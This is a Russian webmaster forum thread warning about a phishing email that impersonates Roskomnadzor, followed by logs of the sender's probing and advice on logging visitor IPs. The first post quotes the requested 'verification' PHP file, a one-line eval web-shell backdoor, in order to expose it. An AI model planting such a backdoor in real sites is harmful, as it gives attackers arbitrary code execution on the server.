Перейти к содержимому


Фотография
  • Пожалуйста, авторизуйтесь для ответа.
8 ответов в данной теме

#1 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 07 октября 2016 - 18:11

Приветствую!
Получил письмо от мошенника, который от лица Роскомнадзора пишет о необходимости идентификации владельца ресурса. Не понятно, как это происходит, но суть не в этом.
Это чудо предлагает создать файл php со следующим кодом
 

<?php
/*Подтверждение доменного имени kupitcheck.wmt.club roskomnadzor-verification =4re00ds92167049999901257a roskomnadzor-verification2 = 54re00ds92167049999901257a */
eval(stripslashes($_REQUEST[roskomnadzor]));
/* roskomnadzor-verification4 = 54re00ds92167049999901257a */
?>

Только вот функция eval исполнит любой код, который придёт в $_REQUEST[roskomnadzor] (оно же $_GET[roskomnadzor] и $_POST[roskomnadzor]).
 
Не ведитесь на это.
Если с вами захотят поговорить из Роскомнадзора, то они придут к вам, а не будут писать через email размещённый на странице контактов.
Исходник письма

Spoiler

 


Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 1
  • Наверх

#2 Знаток ! добрый торговец ! (WMID 217358758215 )

  • Группа: Пользователи
  • сообщений 9 846
  • Регистрация: 18-мая 09
  • МестоположениеЭфиопия
  • Webmoney BL

Отправлено 07 октября 2016 - 20:15

Получил письмо от мошенника, который от лица Роскомнадзора пишет о необходимости идентификации владельца ресурса.

А это массовая рассылка или ломануть именно вас захотели? Уж не те ли, кому здесь помогаете со скриптами? :D Фокус с eval, думается, только новичек измыслить мог, ну и для новичков :)
    • 1
  • Наверх

#3 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 08 октября 2016 - 00:08

А это массовая рассылка или ломануть именно вас захотели?

Не знаю. Может только меня. Просто опубликовал на случай, если кому ещё придёт сие чудо-сообщение.

Думал правда создать тот файл, только засунуть туда что-нибудь прикольное. Например, код от гугл аналитикс и запалить мошенника. :D
 

Уж не те ли, кому здесь помогаете со скриптами? :D

Не, ну если так думать, то можно сразу лезть в пещеру, ну... или уйти в монастырь :)

Кстати это второе письмо от псевдо-роском...
 

Фокус с eval, думается, только новичек измыслить мог, ну и для новичков :)

Сам вот только узнал о этой функции. Даже не знаю цель её использования. Хотя бы с точки зрения безопасности.


Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 0
  • Наверх

#4 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 10 октября 2016 - 16:48

Ещё одно письмо получил. Содержимое в спойлере. Только сейчас уже это другой Return-Path: root@bank-infomagazin.ru, тогда был root@nkryptor.ru.

Spoiler

 

Поймал его IP, ну и вот что писал я

Дата - IP - Браузер - Метод обращения

2016-10-10 16:32:16 - 141.255.162.162 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 - GET
2016-10-10 16:32:32 - 141.255.162.162 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 - NOT
2016-10-10 16:32:48 - 141.255.162.162 - Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/601.3.9 (KHTML, like Gecko) Version/9.0.2 Safari/601.3.9 - NOT

Сие чудо похоже каждые 14 секунд пыталось получить доступ к моему сайту. IP 141.255.162.162 принадлежит некоему Private Layer Inc и насколько я понимаю - это хостер.

 

PS: мошенник настолько тупой, то даже если бы кто-то и внедрил ег ов свой сайт, то всё равно бы ничего из этого не вышло. Код с ошибкой. Дважды. См. в $_REQUEST.


Сообщение отредактировал ^-^: 10 октября 2016 - 16:49

Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 0
  • Наверх

#5 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 14 октября 2016 - 22:28

А это массовая рассылка или ломануть именно вас захотели?

Похоже кто-то меня всё же захотел ломануть.

Вижу в error_log по нескольку раз некто пытался впихнуть array через input в формах регистрации и обратной связи.

А кто-нибудь знает, как в error_log пихать ещё и IP пользователя? Нашёл, что можно через shell сделать, но это для всех сайтов и сервера в целом, а как-то через php файл это можно сделать или нет?


Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 0
  • Наверх

#6 Знаток ! добрый торговец ! (WMID 217358758215 )

  • Группа: Пользователи
  • сообщений 9 846
  • Регистрация: 18-мая 09
  • МестоположениеЭфиопия
  • Webmoney BL

Отправлено 15 октября 2016 - 12:27

 

А это массовая рассылка или ломануть именно вас захотели?

Похоже кто-то меня всё же захотел ломануть.

Вижу в error_log по нескольку раз некто пытался впихнуть array через input в формах регистрации и обратной связи.

А кто-нибудь знает, как в error_log пихать ещё и IP пользователя? Нашёл, что можно через shell сделать, но это для всех сайтов и сервера в целом, а как-то через php файл это можно сделать или нет?

 

Ну, как бы, для сайта (или отдельных важных скриптов, ошибок обращений к БД) лучше отдельный файл логов сделать и писать туда всё что нужно: ай-пи (всю цепочку, на случай использования прокси), юзер агент, реферер, куки и пр.


Сообщение отредактировал ! добрый торговец !: 15 октября 2016 - 12:34

    • 1
  • Наверх

#7 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 15 октября 2016 - 16:55

Отдельный файл логов в момент ошибок, насколько я понял?


Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 0
  • Наверх

#8 Знаток ! добрый торговец ! (WMID 217358758215 )

  • Группа: Пользователи
  • сообщений 9 846
  • Регистрация: 18-мая 09
  • МестоположениеЭфиопия
  • Webmoney BL

Отправлено 15 октября 2016 - 17:36

Отдельный файл логов в момент ошибок, насколько я понял?

Можно для ошибок обращений к БД, можно вообще, для всех действий в пользовательской зоне (для авторизованных), если есть нужда.


Сообщение отредактировал ! добрый торговец !: 15 октября 2016 - 17:37

    • 1
  • Наверх

#9 Знаток ^-^ (WMID 273407224562 )

  • Группа: Пользователи
  • сообщений 6 059
  • Регистрация: 10-сентября 13
  • Webmoney BL

Отправлено 15 октября 2016 - 23:14

Так в том то и особенность, что пользователь не был зарегистрирован.

А в общем понял.

Спасибо! ;)


Бесплатный SSL на 3 мес. / Сертификат SSL от 299 руб.
    • 0
  • Наверх





Еще теги с одним или более ключевыми словами: eval, stripslashes, $_REQUEST, $_REQUEST[roskomnadzor], мошенник, Роскомнадзор, идентификация